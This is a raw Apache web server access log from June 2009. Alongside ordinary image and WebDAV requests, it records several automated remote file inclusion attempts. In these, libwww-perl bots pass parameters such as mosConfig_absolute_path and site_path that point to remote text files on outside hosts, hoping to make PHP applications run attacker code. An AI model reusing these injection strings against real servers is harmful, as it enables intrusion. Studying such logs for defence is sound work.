71.252.170.143 - - [10/Jun/2009:08:34:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.252.170.143 - - [10/Jun/2009:08:34:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.252.170.143 - - [10/Jun/2009:08:34:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.109.233.157 - - [10/Jun/2009:08:34:50 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
68.109.233.157 - - [10/Jun/2009:08:34:50 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
68.109.233.157 - - [10/Jun/2009:08:34:53 -0400] "GET //include/mail.inc.php?skin_board_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
172.16.1.87 - - [10/Jun/2009:08:35:06 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:35:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:35:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
190.54.28.195 - - [10/Jun/2009:08:35:07 -0400] "GET /logs/access_log.Q109052200//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
209.172.33.230 - - [10/Jun/2009:08:36:03 -0400] "GET /logs/access_log.Q109052800//include/admin.lib.inc.php?site_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.812"
209.172.33.230 - - [10/Jun/2009:08:36:03 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.812"
209.172.33.230 - - [10/Jun/2009:08:36:04 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
218.249.36.194 - - [10/Jun/2009:08:36:22 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
